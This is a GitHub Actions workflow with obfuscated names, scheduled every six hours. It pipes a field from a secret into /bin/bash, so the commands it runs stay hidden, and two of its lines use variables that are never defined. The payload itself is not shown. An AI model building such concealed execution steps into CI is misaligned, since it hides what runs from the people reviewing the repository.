name: personalhissing
on:
  workflow_dispatch:
  schedule:
    - cron: '49 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: personalhissing
        env:
          nzhi0: ${{ secrets.nzhi0 }}
        run: |
          echo $nzhi0 | jq -r .fral2 | /bin/bash
          echo $diyff0001 | jq -r .rjkha2135 | /bin/bash
          echo $jn218 | jq -r .jgpij3520 | /bin/bash

